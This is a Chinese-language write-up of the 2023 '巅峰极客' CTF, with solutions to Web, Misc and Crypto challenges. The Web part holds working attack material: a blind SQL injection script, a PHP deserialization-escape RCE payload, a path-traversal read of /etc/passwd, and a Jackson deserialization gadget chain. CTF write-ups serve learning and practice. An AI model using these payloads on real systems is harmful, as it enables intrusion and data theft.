2023“巅峰极客”网络安全技能挑战赛

mof 收录于 ctf

2023-07-26 约 1225 字预计阅读 3 分钟

参考：

https://mp.weixin.qq.com/s/DvRYMkFSr9SFqt_M0f8umg https://mp.weixin.qq.com/s/gOkixXbYSUewUlhd82CkeQ https://fq6p9pyo5tt.feishu.cn/docx/PPG0dCRT4oPLGOxotaicGSKonsc

Web

hellosql

过滤

sleep, benchmark, union, if, *

笛卡尔积造成延时

exp.py

import requests
import string
import time

url = "http://web-c4a5345842.challenge.xctf.org.cn:80/"
flag = ""

for i in range(1,100) :
    time.sleep(0.1)
    low = 32
    high = 127
    mid = (low + high) // 2

    while (low < high):
        payload = "' or case when ascii(substr((select(group_concat(Flagg)) from ctf.Flllag), {}, 1)) > {} then (select max(t1.TABLE_NAME) from information_schema.columns t1, information_schema.columns t2) end#".format(i, mid)
        start_time = time.time()
        r = requests.get(url=url,params={
            "id":payload
        })
        end_time = time.time()
        if (end_time - start_time) >= 0.5:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    if mid == 32 or mid == 127:
        break
    print(i)
    flag += chr(mid)
    print("flag:"+flag)
print(flag)

unserialize

反序列化逃逸；无字母数字rce

<?php
  class pull_it{
  private $x;

function __construct($a){
  $this->x = $a;
}
}
class push_it{
  private $root;
  private $pwd;

  function __construct($a, $b){
    $this->root = $a;
    $this->pwd = $b;
  }
}

function a($data) {
  return str_replace('bbbbbb', 'aaaa', $data);
}

$cmd = '(~%8F%97%8F%96%91%99%90)();';  # phpinfo();
$push = new push_it('mof', new pull_it($cmd));
$payload = serialize($push);
# O:7:"push_it":2:{s:13:"push_itroot";s:3:"mof";s:12:"push_itpwd";O:7:"pull_it":1:{s:10:"pull_itx";s:27:"(~%8F%97%8F%96%91%99%90)();";}}

$root = 'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb';  # 14个bbbbbb
$pwd = '";s:12:"push_itpwd";O:7:"pull_it":1:{s:10:"pull_itx";s:13:"(~%8F%97%8F%96%91%99%90)();";}';
echo serialize(new push_it($root, $pwd));
# O:7:"push_it":2:{s:13:"push_itroot";s:84:"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";s:12:"push_itpwd";s:89:"";s:12:"push_itpwd";O:7:"pull_it":1:{s:10:"pull_itx";s:13:"(~%8F%97%8F%96%91%99%90)();";}";}

注意点：

private属性的成员反序列化后为%00类名%00成员名，这里直接echo看不到%00，发包时要自行添加
舍弃";s:12:"%00push_it%00pwd";s:89:"（28），bbbbbb转化为aaaa减少2个，故需要14个bbbbbb
s:27:"(~%8F%97%8F%96%91%99%90)();"，s数字要根据取反后实际数，修改为s:13:"(~%8F%97%8F%96%91%99%90)();"
最后要舍弃一个}

payload：

#post
root=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&pwd=";s:12:"%00push_it%00pwd";O:7:"pull_it":1:{s:10:"%00pull_it%00x";s:13:"(~%8F%97%8F%96%91%99%90)();";}

hinder

构造任意文件读取，url编码绕过

/%68%69%6e%64%65%72/download.action?filename=../../../../../../../etc/passwd

查看/proc/1/cmdline发现在/bin/sh/run.sh 查看/run.sh发现在/oh_u_f1nd_me

BabyURL（看

jackson二次反序列化 Jackson 打 getObject 二次反序列化，netdoc 可以列目录，读 flag 到 /tmp/file 中即可

public static void main(String[] args) throws Exception {
    URLVisiter urlVisiter = new URLVisiter();
    URLHelper urlHelper = new URLHelper("netdoc:///F14gIsHereY0UGOTIT");
    urlHelper.visiter = urlVisiter;

    KeyPairGenerator keyPairGenerator;
    keyPairGenerator = KeyPairGenerator.getInstance("DSA");
    keyPairGenerator.initialize(1024);
    KeyPair keyPair = keyPairGenerator.genKeyPair();
    PrivateKey privateKey = keyPair.getPrivate();
    Signature signingEngine = Signature.getInstance("DSA");
    SignedObject so = null;
    so = new SignedObject(urlHelper, privateKey, signingEngine);

    POJONode pojoNode = new POJONode(so);
    BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(11);
    setFiledValue(badAttributeValueExpException,"val",pojoNode);

    serialize(badAttributeValueExpException);
    //        unserialize("ser.bin");
}

MISC

welcome

base64解码

foundme

dmp文件，010editor查看，搜索flag

It's just a dump file, and you've found a new lead
Maybe you know the Netflix picture format? Hope this hint helps you. Search for more information to find the flag!

Netflix图片格式为avif，AVIF的文件头为00 00 00 XX 66 74 79 70 从00 00 00 1C 66 74 79 70开始，舍弃后面的00，另保存为.avif 查看图片

Crypto

数学但高中

x=4{0<y<6}
y=4{2<x<6,17<x<18,28<x<30,41<x<42}
y=6{4<x<6,15<x<16,17<x<19,41<x<43,50<x<51}
x=7{0<y<6}
(x-9)^2+(y-3)^2=1
x=10{2<y<3}
(x-12)^2+(y-3)^2=1
x=13{0<y<3}
y=0{11<x<13,15<x<16,50<x<51}
y=-x+17{14<x<15}
y=x-11{14<x<15}
x=15{0<y<2,4<y<6}
x=17{1<y<6}
x=19{3<y<4}
x=21{3<y<4}
(x-20)^2+(y-3)^2=1{2<y<3}
(x-23)^2+(y-3)^2=1{3<y<4}
x=22{2<y<3}
x=24{2<y<3}
(x-26)^2+(y-3)^2=1{25<x<26}
y=0.5x-11{26<x<27}
y=-0.5x+17{26<x<27}
y=2{29<x<30,31<x<33,39<x<40}
x=29{2<y<5}
x=32{2<y<5}
y=x-27{31<x<32}
(x-34)^2+((y-3.5)^2)/(1.5^2)=1
x=36{2<y<3}
(x-37)^2+(y-3)^2=1{3<y<4}
x=38{2<y<3}
x=41{2<y<6}
x=44{3<y<4}
(x-45)^2+(y-3)^2=1{2<y<3}
x=46{3<y<4}
x=47{2<y<3}
(x-48)^2+(y-3)^2=1{3<y<4}
x=49{2<y<3}
x=51{0<y<2,4<y<6}
y=x-49{51<x<52}
y=-x+55{51<x<52}

函数画图 https://www.desmos.com/calculator?lang=zh-CN （括号复制不进去，手动输

Simple_encryption

1.py

from Crypto.Util.number import *
import gmpy2
import random
import binascii
from secret import flag

p = getStrongPrime(1024)
q = getStrongPrime(1024)
N = p * q
g, r1, r2 = [getRandomRange(1, N) for _ in range(3)]
g1 = pow(g, r1 * (p - 1), N)
g2 = pow(g, r2 * (q - 1), N)


def encrypt(m):
    s1, s2 = [getRandomRange(1, N) for _ in range(2)]
    c1 = (m * pow(g1, s1, N)) % N
    c2 = (m * pow(g2, s2, N)) % N
    print("c1=", c1)
    print("c2=", c2)
    return (c1, c2)


c = encrypt(bytes_to_long(flag[:len(flag) // 2]))
print('N=', N)
print('g1=', g1)


def pad(msg, length):
    l = len(msg)
    return msg + (length - l) * chr(length - l).encode('utf-8')


p = getStrongPrime(1024)
q = getStrongPrime(1024)
assert (p != q)
n = p * q
e = 5
d = inverse(e, (p - 1) * (q - 1))
assert (e * d % (p - 1) * (q - 1))

flag = pad(flag[len(flag) // 2:], 48)
m = [int(binascii.b2a_hex(flag[i * 16:i * 16 + 16]).decode('utf-8'), 16) for i in range(3)]
print('S=', sum(m) % n)
cnt = len(m)
A = [(i + 128) ** 2 for i in range(cnt)]
B = [(i + 1024) for i in range(cnt)]
C = [(i + 512) for i in range(cnt)]
Cs = [int(pow((A[i] * m[i] ** 2 + B[i] * m[i] + C[i]), e, n)) for i in range(cnt)]
print('N=', n)
print('e=', e)
print('Cs=', Cs)

'''
c1= 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254
c2= 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350
N= 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963
g1= 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134
S= 234626762558445335519229319778735528295
N= 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101
e= 5
Cs= [1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976, 2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949, 5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976]
'''

exp.py

import gmpy2
from sympy import *
from Crypto.Util.number import *

Cs= [1693447496400753735762426750097282582203894511485112615865753001679557182840033040705025720548835476996498244081423052953952745813186793687790496086492136043098444304128963237489862776988389256298142843070384268907160020751319313970887199939345096232529143204442168808703063568295924663998456534264361495136412078324133263733409362366768460625508816378362979251599475109499727808021609000751360638976, 2240772849203381534975484679127982642973364801722576637731411892969654368457130801503103210570803728830063876118483596474389109772469014349453490395147031665061733965097301661933389406031214242680246638201663845183194937353509302694926811282026475913703306789097162693368337210584494881249909346643289510493724709324540062077619696056842225526183938442535866325407085768724148771697260859350213678910949, 5082341111246153817896279104775187112534431783418388292800705085458704665057344175657566751627976149342406406594179073777431676597641200321859622633948317181914562670909686170531929552301852027606377778515019377168677204310642500744387041601260593120417053741977533047412729373182842984761689443959266049421034949822673159561609487404082536872314636928727833394518122974630386280495027169465342976]
e = 5
n= 28053749721930780797243137464055357921262616541619976645795810707701031602793034889886420385567169222962145128498131170577184276590698976531070900776293344109534005057067680663813430093397821366071365221453788763262381958185404224319153945950416725302184077952893435265051402645871699132910860011753502307815457636525137171681463817731190311682277171396235160056504317959832747279317829283601814707551094074778796108136141845755357784361312469124392408642823375413433759572121658646203123677327551421440655322226192031542368496829102050186550793124020718643243789525477209493783347317576783265671566724068427349961101
A = [128**2, 129**2, 130**2]
B = [1024, 1025, 1026]
C = [512, 513, 514]
c1 = 19024563955839349902897822692180949371550067644378624199902067434708278125346234824900117853598997270022872667319428613147809325929092749312310446754419305096891122211944442338664613779595641268298482084259741784281927857614814220279055840825157115551456554287395502655358453270843601870807174309121367449335110327991187235786798374254470758957844690258594070043388827157981964323699747450405814713722613265012947852856714100237325256114904705539465145676960232769502207049858752573601516773952294218843901330100257234517481221811887136295727396712894842769582824157206825592614684804626241036297918244781918275524254
c2 = 11387447548457075057390997630590504043679006922775566653728699416828036980076318372839900947303061300878930517069527835771992393657157069014534366482903388936689298175411163666849237525549902527846826224853407226289495201341719277080550962118551001246017511651688883675152554449310329664415179464488725227120033786305900106544217117526923607211746947511746335071162308591288281572603417532523345271340113176743703809868369623401559713179927002634217140206608963086656140258643119596968929437114459557916757824682496866029297120246221557017875892921591955181714167913310050483382235498906247018171409256534124073270350
g1 = 20303501619435729000675510820217420636246553663472832286487504757515586157679361170332171306491820918722752848685645096611030558245362578422584797889428493611704976472409942840368080016946977234874471779189922713887914075985648876516896823599078349725871578446532134614410886658001724864915073768678394238725788245439086601955497248593286832679485832319756671985505398841701463782272300202981842733576006152153012355980197830911700112001441621619417349747262257225469106511527467526286661082010163334100555372381681421874165851063816598907314117035131618062582953512203870615406642787786668571083042463072230605649134
N = 21831630625212912450058787218272832615084640356500740162478776482071876178684642739065105728423872548532056206845637492058465613779973193354996353323494373418215019445325632104575415991984764454753263189235376127871742444636236132111097548997063091478794422370043984009615893441148901566420508196170556189546911391716595983110030778046242014896752388438535131806524968952947016059907135882390507706966746973544598457963945671064540465259211834751973065197550500334726779434679470160463944292619173904064826217284899341554269864669620477774678605962276256707036721407638013951236957603286867871199275024050690034901963
m = []

for i in range(2):
    m1 = gmpy2.iroot(Cs[i],5)[0]
    s = Symbol('s')
    eq = A[i] * s ** 2 + B[i] * s + C[i]-m1
    result = list(solve(eq,s))
    m.append(result[1])
flag2 = long_to_bytes(m[0])+long_to_bytes(m[1])[:5]
p = gmpy2.gcd(g1-1,N)
flag1 = long_to_bytes(c1%p)
print(flag1+flag2)